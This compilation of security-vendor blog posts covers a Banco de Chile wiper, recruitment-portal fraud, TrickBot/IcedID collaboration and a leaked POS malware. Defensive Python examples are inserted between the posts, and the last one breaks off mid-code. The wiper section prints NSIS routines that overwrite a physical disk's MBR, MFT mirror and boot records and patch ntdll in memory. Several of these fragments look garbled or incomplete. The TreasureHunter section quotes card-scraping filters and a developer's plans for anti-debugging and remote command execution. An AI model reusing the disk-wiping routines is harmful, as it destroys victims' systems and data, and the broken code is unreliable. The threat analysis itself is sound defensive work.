Banco de Chile ‘MBR Killer’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks

Wiper malware that may have destroyed as many as 9,000 workstations and 500 servers inside the Banco de Chile in a late-May attack has similarities to the Buhtrap malware component known as MBR Killer, leaked to the underground in February 2016.

Analysts at Flashpoint reverse-engineered the malware linked to the May 24 attack against the country’s largest financial institution and found it to be a modified version of the MBR Killer module known as kill_os. MBR Killer infections render the Master Boot Record, and with it the local operating system, unreadable.

According to bank officials, however, the wiper malware was just cover for a deeper attack against endpoints handling sensitive transactions and messaging over the SWIFT network. SWIFT, the Society for Worldwide Interbank Financial Telecommunication, operates the messaging network through which financial institutions exchange payment instructions securely and reliably.

On Sunday, Banco de Chile general manager Eduardo Ebensperger said in a statement that customer accounts were not affected, but that critical processes such as branch services and telephone banking were impacted, as were executive offices and cashier personnel. Ebensperger told Chilean media outlet Pulso that $10 million was stolen and that the stolen funds were funneled to entities in Hong Kong. He added that a forensic analysis conducted by Microsoft concluded this was an “international attack” and attributed it to either Eastern European or Asian groups.

Buhtrap malware and its components, including MBR Killer, were previously used in attacks against multiple Russian financial institutions, resulting in losses of 97 million rubles, or $1.23 million USD. The attacks in Russia forced one bank to disconnect from the Russian electronic payment system.

The attack in Chile comes on the heels of incidents affecting several banks in Mexico that use the country’s Sistema de Pagos Electrónicos Interbancarios (SPEI) interbank transfer system, resulting in approximately $15.4 million USD in losses. In January, Flashpoint was aware of a separate malware attack targeting Mexican financial institutions that followed a pattern similar to previous attacks. Flashpoint was not able to analyze that malware, though the FBI associated the attack with North Korean malware, and a report from El Financiero, a Mexican financial publication, following the January incident identified it as “FALLCHILL,” a North Korean remote administration tool (RAT) used against aerospace, telecommunications, and financial organizations.

At this time, there does not appear to be a connection between the attacks against Mexico’s banking institutions and the attack on Banco de Chile, because the tactics, techniques, and procedures (TTPs) used by the threat actors differ.

The similarities between the malicious code used in Chile and the leaked code from 2016 are in the use of the same NSIS script, below, in both instances. NSIS, or Nullsoft Scriptable Install System, is an open source system used to build Windows installers.

The leaked Buhtrap code contains almost identical Nullsoft Scriptable Install System (NSIS) script as the unpacked Banco de Chile malware.

By and large, the Buhtrap malware is complex, with more than a dozen modules that give attackers the capability to install additional malicious code, retain remote control over a compromised machine, and steal credentials, among other functions. A list of available modules follows:

• “BHO”: a module designed to intercept and replace pages in the Internet Explorer browser.

• “kill_os”: a module designed to erase the MBR.

• “Loaders”: builders of NSIS scripts designed to install malware.

• “Mimimod”: a modified version of the “Mimikatz” program, used to obtain user credentials in the system.

• “ID”: an algorithm for obtaining the unique number of the infected machine.

• “BSShide”: a module designed to hide payment orders in the Business Support Systems (BSS). It modifies the page displayed to the user. SWIFT is part of the BSS.

• “Antidetekt”: a module designed to detect virtual environments and “sandboxes.”

• “UAC”: a module to bypass the User Account Control (UAC) protection.

• “RDP”: patches the OS so that several users can be logged in simultaneously (concurrent remote desktop sessions).

• “VNC”: remote PC control with backconnect.

• “DLL Side-Loading”: used to install a keylogger and to provide communication with the control panel. Enables installation and operation of other modules in the system.

• “Control panel”: used to maintain visibility into infections and install additional modules to the infected host.

• “Builder”: a program designed to collect Trojan modules in one executable file.

• “MWI”: a collection of exploits, part of the “Microsoft Word Intruder” tool that was sold on underground forums.

The Banco de Chile MBR Killer was also packed with VMProtect, which hinders forensic analysis and reverse engineering. Notably, the malware does not gate execution on the victim’s locale or language, although a Spanish language and locale check is present in the code. Attribution of the Banco de Chile attack remains uncertain; it is unclear whether the code was simply reused by a copycat group or whether the attack is linked to the original group behind Buhtrap. Originally, the kill_os module was used to destroy evidence after a successful bank network penetration.

Banco De Chile: Malware Technical Analysis

The malware is an NSIS installer packed with VMProtect. At run time the NSIS System plugin (System.dll) is dropped to %TEMP% and used to make the raw Win32 API calls shown below.

I. Main loop: CreateFile opens the raw physical disk \\.\PHYSICALDRIVE0 (the drive index is formatted into the path, so further drives can be targeted):

Function main_loop_CreateFile
  ; $0 holds the drive index; build the device path \\.\PHYSICALDRIVE<n> in $1
  IntFmt $1 "\\.\PHYSICALDRIVE%d" $0
  Push $0
  StrCpy $0 $1
  Pop $0

II. Master boot record setup (the 512-byte sector read as 446 bytes of boot code, 64 single bytes covering the four 16-byte partition-table entries, and the 2-byte 0x55AA signature):

‘(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i2) i’

III. MBR logical block addressing (the same sector, with each partition entry read as eight single bytes followed by two 32-bit fields, the starting LBA and the sector count):

‘(&i446, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i1, &i4, &i4, &i2) i’

IV. Volume boot record, NTFS (3-byte jump, 8-byte OEM ID, bytes per sector, sectors per cluster, reserved sectors, 24 bytes of legacy BPB fields, then the 64-bit total sector count, MFT cluster, MFT mirror cluster, and clusters per file record):

‘(&i3, &i8, &i2, &i1, &i2, &i24, &i8, &i8, &i8, &i4) i’

V. Process NTFS boot (the overwrite sequence):

Overwrite MBR
Overwrite Master File Table (MFT) mirror
Overwrite Volume Boot Record (VBR) mirror
Overwrite Extended Boot Record (EBR)

The following Win32 API calls, made through the NSIS System plugin, perform each overwrite. Register $2 holds the handle to the physical drive opened above, $4 and $3 the low part and a pointer to the high part of the 64-bit target offset, $5 the replacement buffer and $9 its length:

${ForEach} $7 1 ${OVERWRITE_COUNT} + 1
  ; seek to the target sector (SetFilePointer returns -1 on failure)
  System::Call "kernel32::SETFILEPOINTER(i, i, *p ,i) i (r2, r4, r3, ${FILE_BEGIN}) .r8"
  ${If} $8 <> -1
    ; write the replacement bytes and force them to disk
    System::Call "kernel32::WRITEFILE(i, i, i, p, i) i (r2, r5, r9, r6, ${NULL})"
    System::Call "kernel32::FlushFileBuffers(i) i (r2)"
  ${EndIf}
${Next}
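As an added example (not code from the Flashpoint post or from the malware), the Python below walks the same on-disk structures the System::Call definitions in sections II to IV describe: it parses the MBR partition table and the NTFS volume boot record, computes the byte offsets of the structures the wiper overwrites (MBR, MFT, MFT mirror, backup VBR, EBR), and runs the intactness checks a responder could apply to a disk image after an incident. The 64-sector disk image is constructed inside the script; the field layout follows the published MBR and NTFS boot sector formats.

```python
import struct

SECTOR = 512
MBR_SIGNATURE = 0xAA55            # bytes 55 AA at offset 510, read little-endian
NTFS_OEM_ID = b"NTFS    "
NTFS_PARTITION_TYPE = 0x07
EXTENDED_PARTITION_TYPES = (0x05, 0x0F)


def parse_mbr(sector: bytes) -> dict:
    """446 bytes of boot code, four 16-byte partition entries, 2-byte signature."""
    parts = []
    for i in range(4):
        # status(1) chs_start(3) type(1) chs_end(3) lba_start(4) sector_count(4)
        status, _, ptype, _, lba, count = struct.unpack_from("<B3sB3sII", sector, 446 + 16 * i)
        parts.append({"status": status, "type": ptype, "lba_start": lba, "sectors": count})
    (signature,) = struct.unpack_from("<H", sector, 510)
    return {"boot_code": sector[:446], "partitions": parts, "signature": signature}


def parse_ntfs_vbr(sector: bytes) -> dict:
    """Fields in the order of the malware's VBR structure: jump(3) oem(8)
    bytes/sector(2) sectors/cluster(1) reserved(2) 24 bytes of legacy BPB,
    total sectors(8) MFT LCN(8) MFT mirror LCN(8) clusters per file record(4)."""
    _jump, oem, bps, spc, _res, _legacy, total, mft, mftmirr, _cpr = struct.unpack_from(
        "<3s8sHBH24sQQQi", sector, 0)
    return {"oem": oem, "bytes_per_sector": bps, "sectors_per_cluster": spc,
            "total_sectors": total, "mft_lcn": mft, "mftmirr_lcn": mftmirr}


def wiper_targets(image: bytes) -> dict:
    """Byte offsets of the structures the wiper overwrites, derived from the
    partition table and the NTFS VBR of each NTFS partition."""
    mbr = parse_mbr(image[:SECTOR])
    targets = {"mbr": 0}
    for idx, part in enumerate(mbr["partitions"]):
        if part["type"] == NTFS_PARTITION_TYPE:
            off = part["lba_start"] * SECTOR
            vbr = parse_ntfs_vbr(image[off:off + SECTOR])
            cluster = vbr["bytes_per_sector"] * vbr["sectors_per_cluster"]
            targets[f"vbr{idx}"] = off
            targets[f"mft{idx}"] = off + vbr["mft_lcn"] * cluster
            targets[f"mftmirr{idx}"] = off + vbr["mftmirr_lcn"] * cluster
            # NTFS keeps a backup VBR in the last sector of the volume, which the
            # total-sectors field does not count
            targets[f"vbr_mirror{idx}"] = off + vbr["total_sectors"] * SECTOR
        elif part["type"] in EXTENDED_PARTITION_TYPES:
            targets[f"ebr{idx}"] = part["lba_start"] * SECTOR
    return targets


def check_boot_structures(image: bytes) -> list:
    """Intactness checks over a disk image; empty list means nothing looks wiped."""
    findings = []
    mbr = parse_mbr(image[:SECTOR])
    if mbr["signature"] != MBR_SIGNATURE:
        findings.append("mbr: 0x55AA signature missing")
    for idx, part in enumerate(mbr["partitions"]):
        if part["type"] != NTFS_PARTITION_TYPE:
            continue
        off = part["lba_start"] * SECTOR
        if len(image) < off + SECTOR:
            findings.append(f"partition {idx}: VBR lies outside the image")
            continue
        vbr = parse_ntfs_vbr(image[off:off + SECTOR])
        if vbr["oem"] != NTFS_OEM_ID:
            findings.append(f"partition {idx}: VBR OEM ID is not NTFS")
            continue
        cluster = vbr["bytes_per_sector"] * vbr["sectors_per_cluster"]
        for name, lcn in (("mft", vbr["mft_lcn"]), ("mft mirror", vbr["mftmirr_lcn"])):
            rec = off + lcn * cluster
            if image[rec:rec + 4] != b"FILE":       # every MFT record starts with "FILE"
                findings.append(f"partition {idx}: {name} record 0 lacks FILE signature")
        backup = off + vbr["total_sectors"] * SECTOR
        if image[backup:backup + SECTOR] != image[off:off + SECTOR]:
            findings.append(f"partition {idx}: backup VBR differs from primary")
    return findings


def build_sample_image() -> bytearray:
    """Constructed 64-sector test image (not a real disk): one bootable NTFS
    partition at LBA 8 spanning 56 sectors, 1-sector clusters, MFT at LCN 4,
    MFT mirror at LCN 2, backup VBR in the partition's last sector."""
    img = bytearray(64 * SECTOR)
    struct.pack_into("<B3sB3sII", img, 446, 0x80, b"\0\0\0", NTFS_PARTITION_TYPE, b"\0\0\0", 8, 56)
    struct.pack_into("<H", img, 510, MBR_SIGNATURE)
    vbr = 8 * SECTOR
    struct.pack_into("<3s8sHBH24sQQQi", img, vbr, b"\xeb\x52\x90", NTFS_OEM_ID,
                     SECTOR, 1, 0, bytes(24), 55, 4, 2, 1)
    struct.pack_into("<H", img, vbr + 510, MBR_SIGNATURE)
    img[63 * SECTOR:64 * SECTOR] = img[vbr:vbr + SECTOR]     # backup boot sector
    for lcn in (4, 2):                                        # MFT record 0 and its mirror
        img[vbr + lcn * SECTOR:vbr + lcn * SECTOR + 4] = b"FILE"
    return img


if __name__ == "__main__":
    image = build_sample_image()
    print("wiper targets:", wiper_targets(bytes(image)))
    print("findings on clean image:", check_boot_structures(bytes(image)))
```

On a real image, read sector 0 and the partition's first sector at the same 512-byte granularity. The checks apply to MBR-partitioned disks only: a GPT disk carries a protective MBR with a single 0xEE entry, and the NTFS volumes must be located through the GPT entries instead.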

VI. Protecting the malware process from shutdown (in-memory patch of ntdll!ZwClose):

System::Call "KERNEL32::GETMODULEHANDLE(t) p ('ntdll.dll') .r0"
${If} $0 <> ${NULL}
  System::Call "KERNEL32::GETPROCADDRESS(p, t) p (r0, 'ZwClose') .r1"
  ${If} $1 <> ${NULL}
    ; make the first 6 bytes of ZwClose writable
    System::Call "KERNEL32::VIRTUALPROTECT(p, i, i, *i) i (r1, 6, ${PAGE_EXECUTE_READWRITE}, .r2) .r0"
    ${If} $0 <> 0
      ; save the original 6 bytes, overwrite them, call CloseHandle on a bogus
      ; handle value while the patch is in place, then restore the original bytes
      System::Alloc 6
      Pop $3
      System::Call "NTDLL::MEMCPY(p, p ,i) i (r3, r1, 6)"
      System::Call "NTDLL::MEMCPY(p, t, i) i (r1, t '1', 6)"
      System::Call "KERNEL32::CLOSEHANDLE(i) i (0x12345678) .r4"
      System::Call "NTDLL::MEMCPY(p, p, i) i (r1, r3, 6)"
      System::Free $3
    ${EndIf}
  ${EndIf}
${EndIf}

VII. System shutdown instruction:

Push $1
Pop $1

Possible actions:

• Because the MBR Killer code base is identical, with minor modifications, to the Buhtrap MBR Killer, existing mitigations against Buhtrap should also reduce exposure to this threat.

• Review, and where possible block, execution of binaries from the %TEMP% directory, in particular an installer that drops and loads System.dll (the NSIS System plugin) there.

To download the MBR Killer indicators of compromise (IOCs), click here.

The post Banco de Chile ‘MBR Killer’ Reveals Hidden Nexus to Buhtrap Malware Kit Used to Target Financial Institutions, Payment Networks appeared first on Flashpoint.

Author: Flashpoint

Targeting Popular Job Recruitment Portals About More Than PII

Job listing and recruitment portals have been an attraction for cybercriminals given the volume of personal information uploaded to those sites in the form of resumes, cover letters and other data specific to individuals.

But there’s more to criminals’ interest than just stealing personally identifiable information. Security shortcomings on some of these sites can expose job applicants, business account holders and the recruiters themselves to a number of different threats. For example, when threat actors gain access to legitimate business accounts at recruiting sites, they can use social engineering to con job seekers into replying to phony listings, through which the applicants are inadvertently recruited as money mules or lured into money laundering operations. Malicious documents disguised as an application submitted as a PDF can also slip past lax or non-existent scanning tools and target the recruitment portal directly, or give an attacker access to data stored on the portal and expose applicants to identity theft.

Flashpoint analysts have noticed a marginal increase in the number of mentions on Deep & Dark Web forums related to such activity around recruitment portals, many of which involve advertisements for the availability of compromised accounts, or criminals soliciting business accounts in order to list jobs on the platforms. Attackers want access to business accounts in order to leverage their phony job listings and recruit people who would ultimately participate in fraud without their knowledge.

It’s likely that most of the recruitment portals are either unaware of such activity, or hesitant to disclose it, meaning that analysts may not have a true handle on the full scope of the problem. Given the increasing number of mentions and interest in abusing these platforms, threat actors may find this to be a useful tactic going forward.

The recruitment of unwitting mules is a growing problem on a number of online platforms that accept classified ads, but most prominently on job recruitment portals. Desperate for employment, a candidate may think they’re applying for a legitimate position. In actuality, the nonexistent positions—typically for merchandise handlers or payment processors—are a means of recruiting unwitting applicants into performing activity that facilitates fraud schemes, such as money laundering, by receiving unauthorized transfers of funds and sending the funds on to other recipients, typically for a nominal fee, frequently 10% of the amount they receive. The applicants are likely to believe the position is more credible if it is posted by a reputable company on a popular recruitment platform.

The phony job solicitations are professionally written and appear legitimate to casual observers and at times to the actual business, who may have numerous satellite campuses and could be unaware of where a local office or contractor could be listing a job.

When it comes to targeting recruitment professionals, Flashpoint analysts have observed that threat actors typically go after such employees via email phishing campaigns rather than attacking the recruitment portals, given the continued success of phishing schemes. Credential stuffing, or account checking, attacks are more viable when targeting recruitment portal accounts. Credential stuffing attacks leverage the hundreds of millions of breached and leaked credentials available on the Deep & Dark Web (DDW) and the surface web to gain unauthorized access to accounts. Attackers use automated login requests to repeatedly try username-password combinations until they gain access to an account; it’s a tactic that has advantages over using malware-laced PDF documents, which may never be downloaded or could be flagged by a scanner.
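As an added example, not from the Flashpoint post, the detection logic below runs over a constructed set of portal login events. The signature of credential stuffing is one source address cycling through many different usernames with a high failure rate, which is distinct from a single user mistyping their own password. The log format, thresholds and addresses are assumptions, not any platform’s real format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample login events (not real portal logs). 203.0.113.7 sprays
# six different accounts in five seconds and gets one hit; 198.51.100.4 is a
# single user retrying their own password.
SAMPLE_LOG = """\
2018-06-12T09:00:01Z ip=203.0.113.7 user=alice@example.com result=fail
2018-06-12T09:00:02Z ip=203.0.113.7 user=bob@example.com result=fail
2018-06-12T09:00:02Z ip=203.0.113.7 user=carol@example.com result=fail
2018-06-12T09:00:03Z ip=203.0.113.7 user=dave@example.com result=success
2018-06-12T09:00:04Z ip=203.0.113.7 user=erin@example.com result=fail
2018-06-12T09:00:05Z ip=203.0.113.7 user=frank@example.com result=fail
2018-06-12T09:00:10Z ip=198.51.100.4 user=grace@example.com result=fail
2018-06-12T09:00:20Z ip=198.51.100.4 user=grace@example.com result=fail
2018-06-12T09:00:35Z ip=198.51.100.4 user=grace@example.com result=success
"""


def parse_line(line: str) -> dict:
    """Parse one 'timestamp key=value ...' event (assumed log format)."""
    ts, *kvs = line.split()
    event = dict(kv.split("=", 1) for kv in kvs)
    event["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return event


def detect_stuffing(log_text: str, window: timedelta = timedelta(minutes=5),
                    min_users: int = 5, min_fail_ratio: float = 0.6) -> dict:
    """Return {source_ip: alert} for sources that, within any sliding window,
    tried at least min_users distinct accounts with a failure ratio at or
    above min_fail_ratio. The alert lists accounts the source logged into,
    which are the ones to lock and reset."""
    events = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                    key=lambda e: e["ts"])
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits the window
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            fails = sum(e["result"] != "success" for e in win)
            if len(users) >= min_users and fails / len(win) >= min_fail_ratio:
                alert = {"distinct_users": len(users), "attempts": len(win),
                         "failures": fails,
                         "compromised": sorted({e["user"] for e in win
                                                if e["result"] == "success"})}
                # keep the widest qualifying window seen for this source
                if ip not in alerts or alert["distinct_users"] > alerts[ip]["distinct_users"]:
                    alerts[ip] = alert
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_stuffing(SAMPLE_LOG).items():
        print(ip, alert)
```

The per-source thresholds are deliberately simple; in production the same check is usually keyed on a device fingerprint or ASN as well as the IP, because stuffing tools rotate through proxy pools, and the “compromised” list feeds a forced password reset and a step-up to two-factor authentication.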

Job recruitment portals are a warehouse of personal information, and by successfully compromising an applicant’s or recruiter’s account, criminals are able to harvest applicants’ PII, execute social engineering attacks that lead to identity theft, or recruit unwitting mules for fraud.

Flashpoint recommends the following mitigation advice for recruiters and platforms:

• Recruiters should always utilize the document parsers that many recruitment platforms have to avoid being infected by malicious documents.

• Recruiters should enforce employees’ usage of the recruitment platforms rather than passing around PDF resumes and cover letters.

• Require proper virus scanning of submitted documents.

• Secure accounts with unique passwords and two-factor authentication in order to deter account takeover.

• Recruiters should work with internal security teams to do cursory research across recruitment sites for fraudulent listings.

• Recruitment portals should implement various security checks that analyze malicious documents and URLs for malicious activity.

• Recruitment portals should always advise users of the risk of accepting third-party documents.

The post Targeting Popular Job Recruitment Portals About More Than PII appeared first on Flashpoint.

Author: Flashpoint

Trickbot and IcedID Botnet Operators Collaborate to Increase Impact

Different banking malware operations previously competed for victims, often seeking out and uninstalling one another upon compromising machines; for example, the SpyEye malware would uninstall Zeus upon infection. Now, in what may indicate a shift toward more collaboration among cybercrime groups, the operators of the IcedID and TrickBot banking Trojans appear to have partnered and are likely sharing profits, based on operation details.

The clincher came when analysts at Flashpoint recently examined samples showing that computers infected with IcedID are also downloading TrickBot, a prolific piece of malware considered to be the successor to the Dyre banking Trojan.

Researchers first spotted IcedID in November 2017, when IBM’s X-Force research team published a report on the new banking malware spreading via massive spam campaigns. Compromised computers were first infected with the Emotet downloader, which then grabbed IcedID from the attacker’s domain; the Russian-speaking cybercriminals behind Emotet are believed to include some of the operators of the Dridex banking Trojan. IcedID maintains persistence on infected machines and has targeted companies mainly in the financial services, retail, and technology sectors.

Image 1: The typical fraud ecosystem that involves IcedID/TrickBot cash-outs

It appears that attackers now send IcedID directly as spam, and that piece of malware acts as a downloader that installs TrickBot, which in turn installs other modules on victims’ machines.

While it is unusual to find two different malware families infecting the same machine, Flashpoint analysts have determined through source intelligence with knowledge of both parties’ operations that there are indications of extensive collaboration between these two fraud operators. Human fraudsters are central to this cybercrime model; the TrickBot operators, for example, combine automated attacks with knowledgeable fraud operators who review the data harvested from victims’ machines and can carry out real-time account takeover (ATO) operations.

TrickBot and IcedID Fraud Master Collaboration: Monetization Funnel

Even the most sophisticated cybercriminal organization cannot reap financial rewards without the human resources required to cash out victims’ bank accounts. Cybercriminals’ ability to profit from the products and services involved in financial fraud rests on the availability of fraud masters, money mules, and related services.

The TrickBot and IcedID collaboration gives this pairing significant capabilities. First, the attacks are complex; while the malware’s main capabilities are its use of token grabbers, redirection attacks, and webinjects to steal banking credentials, there are other modules at the operators’ disposal that allow them to have deep coverage of a victim’s machine and expand the breadth and scope of an attack, thereby allowing them to derive additional potential sources of profit from a successful compromise.

Key to this complete coverage is the ability to carry out account checking, or credential stuffing, in order to determine the value of a victim’s machine and their access. Attackers can leverage higher value targets for network penetration, for example, while attackers can use other compromised targets for cryptocurrency mining.

IcedID has been in the wild since April 2017 and was originally known as BokBot; this malware is exclusively a threat to Windows. Emotet was associated with this malware, and operators used it mainly as a loader and to maintain persistence in order to install and execute additional malware, including a virtual network computing (VNC) module for remote management and an antimalware bypass module. IcedID creates proxies that are used to steal credentials for a host of websites that are mainly in financial services, though some sites also correspond to the retail and technology sector. The local proxy intercepts traffic and uses a webinject that steals login data from the victim.

Image 2: The IcedID banker includes an extensive token grabber module with the alphabetical parameters.

TrickBot targets victims in a wide swathe of industries by leveraging multiple modules, including leaked exploits, and targets victims for various malicious activities, such as cryptocurrency mining and ATO operations.

Central Command

Linguistic analysis and an investigation into TrickBot and IcedID botnet operations reveal that each botnet campaign belongs to a small group that commissions or buys the banking malware, manages the flow of infections, makes payments to the project’s affiliates (traffic herders, webmasters, mule handlers), and receives the laundered proceeds. Flashpoint assesses with high confidence that a head of operations oversees a complex network of actors who likely know each other only by aliases even after years of working together. Each segment of the ecosystem, the so-called affiliates, are specialists within their respective domains. While they deliver value to the botnet owner, they act independently, employing their own closed networks to accomplish assigned tasks. The organizational complexity of these projects, along with the stringent security practices exercised by everyone throughout the supply chain, poses a significant challenge to investigations.

Role of Botmaster in Cybercrime Operations

The responsibility to monitor the botnet, or the sum total of all victims’ online activities, falls on the TrickBot and IcedID botmaster. A bot’s activity is recorded in the command-and-control (C2) database according to the parameters specified in the control panel’s preferences. The botmaster also accepts XMPP (Jabber) notifications via the “jabber_on” field in the backend when a victim logs in to a banking page of interest. Once the login is recorded, the botmaster passes a message to the fraud masters that reads, “Try to log in with: Login AND passcode: at this url: <bank_login_url>.”

The botmaster may elect to receive notifications when a victim accesses only certain online banking applications. If, for example, the project is built around European or US financial institutions (possibly because that is where the syndicate’s money laundering capabilities are focused), they would receive Jabber notifications based on their geographical cash out preference.

The botmaster decodes the logs and parses them for the needed content. Exported logs may contain tens of millions of lines of data, so a botmaster will likely employ a parsing application to extract the relevant data. Advanced banking Trojans such as Citadel have a built-in log parser. Once information consisting of the victim’s login credentials, answers to the secret questions, and email address is extracted from the logs, it is passed on to an affiliate who manages real-world operations.

Geographical disparity presents an obstacle in monetizing access, though this issue is typically solved through the use of money mule (or drop) services. Mules open bank accounts in the geographic location of the victim and at the same financial institution. They receive fraudulent Automated Clearing House (ACH) and wire transfers into their accounts and forward the proceeds to the botnet owner or an intermediary. Higher up the chain, mule handlers direct mule recruiting and money laundering activities at a range of locations and financial institutions; many mule handlers advertise their services on cybercrime forums.

Image 3: The IcedID banking grabber request reveals a detailed URL pattern with the data submission and exfiltration to the inject server.

Based on the close collaboration between the TrickBot and IcedID operators and their shared backend infrastructure, the operators will likely continue to collaborate closely on cashing out stolen accounts.

Such collaboration may also signal that fraud masters and malware developers are continuing to foster collaborative fraud operations targeting corporations in an attempt to bypass the latest anti-fraud measures.

Image 4: The IcedID/TrickBot operators rely on detailed inject messages from victim machines for ATO fraud.

Attachments and Downloads

To download the Indicators of Compromise (IOCs) for TrickBot and IcedID, click here.

To download the Snort rule, click here.

The post Trickbot and IcedID Botnet Operators Collaborate to Increase Impact appeared first on Flashpoint.

Author: Flashpoint

TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked

The source code for a longstanding point-of-sale (PoS) malware family called TreasureHunter has been leaked on a top-tier Russian-speaking forum. Compounding the issue is the coinciding leak by the same actor of the source code for the malware’s graphical user interface builder and administrator panel.

The availability of both code bases lowers the barrier for entry for cybercriminals wishing to capitalize on the leaks to build their own variants of the PoS malware.

Point-of-sale malware has been at the root of many breaches, including massive thefts at retailers Target in 2013 and Home Depot in 2014; in each case attackers were able to extract more than 100 million payment card and customer records from point-of-sale terminals by scraping card data before it was encrypted and sent to the payment processor. Both retail giants paid tens of millions of dollars in settlements, and in Target’s case, its chief executive officer resigned his position.

Industry Collaboration on Detection and Prevention

TreasureHunter has been known and investigated since 2014, but until now investigators have had to reverse-engineer its code in order to analyze it. Now with the full code available, analysts have previously unseen insight into the malware’s operation. Flashpoint analysts, who discovered the source code leak in March, proactively collaborated with researchers at Cisco Talos, who reviewed and improved protections, and advanced-detection mechanisms, in an effort to disrupt potential copycats who may have their hands on the source code.

In the meantime, Russian-speaking cybercriminals have been observed on the vetted underground discussing improvements and weaponization of the leaked TreasureHunter source code. Notably, the original developer appears to be a Russian speaker who is proficient in English. Originally, this malware appears to have been developed for the notorious underground shop dump seller “BearsInc,” who maintained presence on various low-tier and mid-tier hacking and carding communities (below is a graphical representation of such an operation on the Deep & Dark Web). It’s unknown why the source code was leaked at this time.

Image 1: A graphical representation of a typical cybercrime dump shop ecosystem.

One Leak Can Spawn Many Variants

TreasureHunter behaves like many other point-of-sale malware samples. Once an attacker has access to a Windows-based server and the point-of-sale terminal, the malware is installed and it establishes persistence by creating a registry key that runs the malware at startup. It then enumerates running processes, and scans device memory looking for track data, including primary account numbers (PANs), separators, service codes, and more. It then establishes a connection with the attacker’s command and control server and sends the stolen data to the criminal.

The leak of the builder adds another dimension to the availability of the TreasureHunter payload and configurations. In the past, malware source code leaks such as the Zeus banking Trojan have spawned numerous variants, including Citadel, which cost organizations hundreds of millions in losses. PoS malware leaks have had similar effects, most notably with the 2015 leak of the Alina malware which led to the creation of the ProPoS and Katrina variants. The actor behind the TreasureHunter leak said:

“Besides alina, vskimmer and other sniffers, Treasure Hunter still sniffs ( not at a very high rate, but it still does ) and besides that , since now you have the source code, it can be update anytime for your own needs.”

For researchers, the availability of the source code opens the door into new avenues of analysis and proactive visibility into such activity on the underground. This affords organizations such as Flashpoint the ability to collaborate with others in the industry such as Cisco Talos in this case to improve existing protections and force attackers back to the drawing board.

Source-Code Level Insight

The code project appears to be called internally trhutt34C and was written in pure C with no C++ features. It was originally compiled with Visual Studio 2013 and built to run on Windows XP. Based on analysis, researchers believe the developer intended to improve and redesign various features, including anti-debugging, code structure, and gate (C2) communication logic, with the stated goal of frustrating malware analysis and subsequent research; the developer left behind a note that said: “We want the malware researchers screamin’!”

Image 2: A snapshot of the TreasureHunter source code.

The unfinished project’s to-do list, left in the source, reads:

  • TO DO for the next version of the client (0.2 Beta):
    • Replace all Unicode versions of functions with ANSI versions. Now why did I ever go for wide-char in the first place?..
  • Improve the code structure:
    • Replace all the if – else constructs that are rendered needless by return commands;
    • Organize the includes;
    • Give the code proper commenting so that I am able to modify and improve it after not having seen it for some time (if such a thing happens).
  • Make scan exceptions and service codes configurable.
  • Add the following commands to the gate communication logic:
    • Download and execute for updating;
    • Remote CMD command execution;
    • Remote self-removal for emergency cases.
  • Add anti-debugging:
    • Use self-debugging by creating a child process (may be improved later by reversing the tables);
    • Improve the MD5 function and use it to find debuggers by signatures (maybe to be added in future versions);
    • Use GetTickCount to detect parts of code being stepped through (maybe to be added in a “heuristical” joint algorithm with the abovementioned);
    • Upon finding a debugger, destroy the critical section and/or start creating new threads infinitely until the application crashes.
    • Maybe also kill processes and delete debuggers and/or decompilers permanently. We want the malware researchers screamin’!
  • Add better persistency and timeouts to gate communication.
  • Add local saving of data if the gate can’t be reached for a certain period of time.
  • Add the option to run the program as a service on Windows XP.
  • Improve the code structure and add comments to avoid future confusion.
  • Add error handling and backup restart in case of crash or heap overflow (malloc fail).
  • Improve the Clingfish system (so that a clingfish thread doesn’t do the same thing as the main thread right after being spawned).
  • Debug the system information extraction mechanism further (on different OS versions).
  • Improve the track-finding algorithm to make it faster.

The structure used to hold stolen dumps is as follows; it records where the scraped data came from (the scanned process’s image path and PID) together with the track data itself:

typedef struct dumpsHolder {
    TCHAR *lpFileName;      /* image path of the scanned process */
    int lpFileNameLength;
    int procID;             /* PID the track data was scraped from */
    char *trackArr;         /* buffer of scraped track data */
    int trackArrLength;
} dumpsHolder;

The process scan works with an exclusion list: processes whose image path contains any of the following strings are skipped:

char *scanExceptions[SCANEXCEPTIONSNUM] = {"System32", "SysWOW64", "\\Windows\\explorer.exe"};

The malware scrapes credit card track data and keeps only cards whose service code is one of the following:

char *serviceCodes[SERVICECODESNUM] = {"101", "201", "121", "231", "221", "110"};
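As an added example, not code from the leaked TreasureHunter source or from the Flashpoint post, the Python below shows what the scan the text describes looks like from the defender’s side: a search over a process memory buffer for Track 2 data, with the same exclusion list and service-code filter the source uses. A responder would run it against a memory dump of a POS process to confirm exactly what card data sits in cleartext, or to validate a detection rule. The buffer is constructed, the PANs are the public Visa and Mastercard test numbers, and the Track 2 regex is an assumption about how the data appears in memory.

```python
import re

# Lists from the leaked source, as quoted on the page.
SCAN_EXCEPTIONS = ("System32", "SysWOW64", "\\Windows\\explorer.exe")
SERVICE_CODES = {"101", "201", "121", "231", "221", "110"}

# Track 2 as it typically sits in memory: PAN (13-19 digits) '=' YYMM, a
# 3-digit service code, then discretionary data (assumed pattern).
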